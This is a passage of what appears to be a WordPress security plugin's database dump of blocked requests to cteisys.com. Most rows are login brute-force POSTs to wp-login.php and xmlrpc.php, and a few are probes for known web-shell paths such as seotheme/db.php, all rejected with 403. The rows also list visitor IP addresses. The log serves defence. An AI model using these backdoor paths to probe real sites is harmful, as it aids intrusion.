Safari\\/537.36\"}','DOFzSt0YgJkl5fMbZChxQ3er',0,1664841185.9889,18185,'','POST',403,0,600,0,1,'',0),('173.236.184.116',2917972084,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','boOzlTAVcPWYJFuxSH5M72ek',0,1664841975.3090,18217,'','POST',403,0,600,0,1,'',0),('121.42.231.47',2032854831,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','AZQv8xNiL4EwIMgmSWtkFVOd',0,1664841999.9346,522,'','POST',403,0,600,0,1,'',0),('51.142.148.198',864982214,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.106 Safari\\/537.36\"}','V3sOfnuXvHPYe0WAr4ZozEqK',0,1664842315.1484,516,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','7REwfj3K9qaYbHsBrUclDtOi',0,1664842794.3014,18042,'','POST',403,0,600,0,1,'',0),('199.195.254.123',3351510651,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','kyjhX7MQrCtIdgToY9vpLSiB',0,1664842977.0462,17770,'','POST',403,0,600,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','rK81qWBdwusoSfjC4aLeTQFk',0,1664843489.1121,495,'','POST',403,0,600,0,1,'',0),('46.17.172.162',772910242,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','DThomFVCeGIfBNlXi9bSO1WJ',0,1664843498.0925,1582,'','POST',403,0,515,0,1,'',0),('202.226.37.184',3403818424,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','hLjAdmN6qzrlU23GY7RsKfbH',0,1664843504.5378,577,'','POST',403,0,515,0,1,'',0),('148.66.145.163',2487390627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','fEqZQb9Vtdj8TFCwhNM2rBp5',0,1664843505.6131,1259,'','POST',403,0,515,0,1,'',0),('91.189.176.172',1539158188,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','3Wt6TQlNFKaiqgG1H0ukbsIv',0,1664843511.7960,522,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','PDI6wVvZXRsnFzSm0JxNrA8C',0,1664843525.7252,492,'','POST',403,0,515,0,1,'',0),('162.55.131.89',2721547097,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','Gu3PDsW5OUhwpKN62t1FzoLA',0,1664843528.0903,492,'','POST',403,0,515,0,1,'',0),('5.161.119.55',94467895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','6fFGhKTXqODiopMStjey40IV',0,1664843532.4565,496,'','POST',403,0,515,0,1,'',0),('198.46.93.129',3324927361,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','UV3iuLHaQzrekYFApX72IP6D',0,1664843537.6083,597,'','POST',403,0,515,0,1,'',0),('123.25.21.16',2065241360,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','yq3ePxu8XmDn4jlfiYhQwrFK',0,1664843619.1992,1364,'','POST',403,0,600,0,1,'',0),('159.203.143.36',2680917796,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','VhAfXE4Fg0jMJp3IlxD6zv92',0,1664843643.3643,1259,'','POST',403,0,600,0,1,'',0),('208.113.198.121',3497117305,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','1xE9PlqhDCUbO6iuSgjz3yGQ',0,1664844464.7653,17754,'','POST',403,0,600,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','P02RTZKBW6MaG5weS9zugIUX',0,1664845265.7488,2429,'','POST',403,0,600,0,1,'',0),('75.119.135.205',1266124749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','V0UncCGsTAwFJ4LObdm8K5lj',0,1664845294.0425,588,'','POST',403,0,600,0,1,'',0),('142.93.168.95',2388502623,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','oXeJuK0RaSmIiENxHQP9wnsW',0,1664845775.7674,13958,'','POST',403,0,515,0,1,'',0),('125.124.125.235',2105310699,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','VWHLeZXwzQuoR4MJD0dA89P7',0,1664845772.0644,17664,'','POST',403,0,515,0,1,'',0),('84.54.23.178',1412831154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','oi2HVhPebljUNSW57dZ9GKmy',0,1664845772.9419,16950,'','POST',403,0,515,0,1,'',0),('207.244.229.40',3488933160,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','qwHxgukmMaviIO2RdQfPpDzX',0,1664845795.3672,591,'','POST',403,0,515,0,1,'',0),('208.109.10.82',3496806994,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','Uusfm8JdCpA4rczOVIweiETQ',0,1664845797.2309,491,'','POST',403,0,515,0,1,'',0),('92.53.96.165',1547002021,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','nRGVPiSv5oXI8KA01zNjB2Hl',0,1664845819.1001,1184,'','POST',403,0,515,0,1,'',0),('162.215.12.182',2732002486,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','zjS6KpyNgLFRUH7kr2ZWcxlh',0,1664845818.6252,2076,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','iP2s94KmEzRJjAy1Xu0th7vW',0,1664845821.4086,530,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','tzvlYjB6A1IpbKZsxWOLyhVm',0,1664846030.2104,1258,'','POST',403,0,600,0,1,'',0),('51.159.155.6',866097926,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','aj4rJBU67ivIQwSs0kKxLoRT',0,1664846089.7812,1561,'','POST',403,0,600,0,1,'',0),('123.25.21.16',2065241360,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','59YgWqpUCxf8IEkr1Hoh3ans',0,1664846115.7433,1285,'','POST',403,0,600,0,1,'',0),('54.38.73.235',908478955,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','9AOaF05jY3Zgx8qcvQGVdeDC',0,1664846910.1581,537,'','POST',403,0,600,0,1,'',0),('75.119.135.205',1266124749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','Lqi9UGWJujedtY42xlmvESP5',0,1664846933.7687,1350,'','POST',403,0,600,0,1,'',0),('23.99.229.218',392422874,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','En6BvjVblio9Z0gwdak3xpOL',0,1664847730.6643,17570,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','NK4LGOA0s23rgTcopvCE8MhI',0,1664847754.5524,454,'','POST',403,0,600,0,1,'',0),('91.249.163.48',1543086896,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','ez7nsQTVLJS9wYmGhHFU4cIE',0,1664848558.0533,17589,'','POST',403,0,600,0,1,'',0),('157.230.15.115',2649100147,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','XYr4GMzq2wI0SEtWDo8FkNg9',0,1664848581.8429,464,'','POST',403,0,600,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','3NBrZvj7WERasP82xflAFeh9',0,1664849195.0592,16410,'','POST',403,0,515,0,1,'',0),('15.161.131.84',262243156,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','CBnTDseQqLR2FKwtSZWuNxpO',0,1664849192.9663,18630,'','POST',403,0,515,0,1,'',0),('193.136.232.254',3246975230,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','e97IKmTjYhyi1sUGAXaBC2Sd',0,1664849219.3348,587,'','POST',403,0,515,0,1,'',0),('161.97.142.55',2707525175,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','TBd7JO2KgQ5huaiA3VvXP0Hb',0,1664849229.8859,623,'','POST',403,0,515,0,1,'',0),('34.86.229.13',576120077,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Qxfm37uqZ8saWCTPoL1EDVMz',0,1664849238.2227,548,'','POST',403,0,515,0,1,'',0),('164.52.208.110',2754924654,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','UyZJtunqWh4LID7Xc83rw9SE',0,1664849239.1524,612,'','POST',403,0,515,0,1,'',0),('139.180.186.240',2343877360,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','GV0OBCMk6bnx3dqLSIWmrlTQ',0,1664849245.8715,701,'','POST',403,0,515,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/photocrati-theme-v4/admin/scripts/scripts-update.php','','{\"1\":\"ALittle Client\"}','iDCqM718oRJnxtSu9skjPT06',0,1664849331.7324,363,'','GET',403,0,700,0,1,'',0),('68.183.71.174',1152862126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','U4S5LNwjlODhzaE2uBiPxIHo',0,1664849390.0595,12361,'','POST',403,0,600,0,1,'',0),('68.183.71.174',1152862126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','pSXury9DEcl6xIzgGsvn4FYN',0,1664849414.1331,464,'','POST',403,0,600,0,1,'',0),('148.72.207.163',2487799715,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','1MvrjGdq3wVEgLASClD6KH4B',0,1664850222.9083,17268,'','POST',403,0,600,0,1,'',0),('23.97.205.210',392285650,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','7VfPBc5Om0izbdqHxh8re3R4',0,1664850246.0766,606,'','POST',403,0,600,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','RVrv2PqnpzoTiwmJZEGKkXj8',0,1664851048.1873,17440,'','POST',403,0,600,0,1,'',0),('159.69.8.8',2672101384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','Fkc5LgIQzjGauKdOfpiJsVeN',0,1664851071.1670,1234,'','POST',403,0,600,0,1,'',0),('193.136.232.254',3246975230,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','QHOUi2sDdMqk8FVWASxcuw1o',0,1664854505.0918,1038,'','POST',403,0,515,0,1,'',0),('142.93.168.95',2388502623,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','6OERACQT0vJKqaWu4ZmNBpSH',0,1664854509.0586,732,'','POST',403,0,515,0,1,'',0),('157.245.71.145',2650097553,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','b5uW1hNf2kn9cqrPXLSvVCYF',0,1664854513.3837,546,'','POST',403,0,515,0,1,'',0),('162.213.249.210',2731932114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','cC52m3bE1BsNLToA4VvpKzS7',0,1664854514.8421,664,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','Eh9NzjlDtqrp65i21HoxBnfI',0,1664854516.2456,593,'','POST',403,0,515,0,1,'',0),('47.242.115.115',804418419,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','YpjHndBrEAMkVfvPNtbiJ6hX',0,1664854522.1489,558,'','POST',403,0,515,0,1,'',0),('198.98.49.240',3328324080,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','i6pTJ40caWY5KIUSeOzV2hsE',0,1664855609.7126,17155,'','POST',403,0,600,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','Wsq8TyZp0laeCnJ21vVEAz7I',0,1664855700.3532,1274,'','POST',403,0,600,0,1,'',0),('92.53.96.243',1547002099,'','http://cteisys.com/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 YaBrowser\\/20.9.3.136 Yowser\\/2.5 Safari\\/537.36\"}','taKMSXfiH7URm1uxdJ4VTlr9',0,1664855791.2624,11488,'','GET',403,0,700,0,1,'',0),('148.66.145.163',2487390627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','TpsKmc15teXPRaGC4YSAF0gZ',0,1664891033.4373,8476,'','POST',403,0,515,0,1,'',0),('78.47.46.81',1311714897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fCo3eSqWria8BMQywLJdU2Nk',0,1664891035.9191,6083,'','POST',403,0,515,0,1,'',0),('185.255.131.28',3120530204,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','meR40YkjW68oKXrlNwaSyCfP',0,1664891041.9936,1426,'','POST',403,0,515,0,1,'',0),('91.134.248.192',1535572160,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','Bg0xkCS2T8D5zO3Fw6ye4aoE',0,1664891047.8877,758,'','POST',403,0,515,0,1,'',0),('78.47.46.81',1311714897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','EAvFnfmHcDiG6kJXzYxNZWoq',0,1664891051.4124,557,'','POST',403,0,515,0,1,'',0),('185.220.174.115',3118247539,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','IbAEHqX9zdGOv5iJRrNgQMuK',0,1664891052.8141,478,'','POST',403,0,515,0,1,'',0),('34.86.229.13',576120077,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','65DhEIGOMeUaQ07X92bqWSjV',0,1664891054.7972,487,'','POST',403,0,515,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','65ih4ZW0BwVOQ9Ucl3tufrka',0,1664891062.4412,566,'','POST',403,0,515,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','xPuhc9nRL4Tk8UWzlYtBjqi0',0,1664891435.4334,17430,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','SdunTzMPGOEXChjp8IgmqWQ6',0,1664891460.2966,521,'','POST',403,0,600,0,1,'',0),('4.231.48.197',82260165,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WLMIvt5AyG2zQxgTlC4o3au8',0,1664891681.7603,11555,'','GET',403,0,700,0,1,'',0),('4.231.48.197',82260165,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','rxfbuSeszURhM8VEGyQgtFk4',0,1664891698.3086,572,'','GET',403,0,700,0,1,'',0),('45.136.107.178',763915186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','FyMa9ANSw3jTu1d5RVGgY68K',0,1664898517.5053,903,'','POST',403,0,515,0,1,'',0),('92.205.64.102',1556955238,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','PcoqZCzrdh1Ak70IigLYTpDw',0,1664898518.1819,696,'','POST',403,0,515,0,1,'',0),('159.65.241.136',2671899016,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','Cokef2QBVTEUhXmSMLxRZ3nc',0,1664898519.9220,478,'','POST',403,0,515,0,1,'',0),('5.161.119.55',94467895,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','Y4A0b2TVqjL1pFhKEcWrePs3',0,1664898532.9368,1247,'','POST',403,0,515,0,1,'',0),('198.98.51.74',3328324426,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','elBYKLXxmazh94MnriHgOocu',0,1664901333.4857,1961,'','POST',403,0,600,0,1,'',0),('202.61.232.79',3393054799,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','hsikyHCzJbTf46AMxwp87BKo',0,1664902432.3365,18853,'','POST',403,0,515,0,1,'',0),('82.165.82.26',1386566170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','58zDdFV0PN6u4J9CAcS3EBwi',0,1664902436.2251,14968,'','POST',403,0,515,0,1,'',0),('182.79.46.50',3058642482,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','CZNL6vEWoIcBpVRumq310HOJ',0,1664902451.2958,1019,'','POST',403,0,515,0,1,'',0),('148.66.145.163',2487390627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','2v9NOaTAMQf3oSsYGql1biWt',0,1664902454.3407,607,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','MHX1V9OuYQyDr3pRWoLmxjFS',0,1664902459.1041,605,'','POST',403,0,515,0,1,'',0),('45.158.14.218',765333210,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','VDxIRFJnlsh0ENUWXiY4O7TL',0,1664902464.9592,659,'','POST',403,0,515,0,1,'',0),('84.54.23.178',1412831154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','PdkCiaBFeG6AYSfxclOWjwUh',0,1664902467.9800,732,'','POST',403,0,515,0,1,'',0),('148.66.145.163',2487390627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','LMUiTgzqYRKt69P4sF0Qd3ne',0,1664902468.8108,1052,'','POST',403,0,515,0,1,'',0),('128.199.152.152',2160564376,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 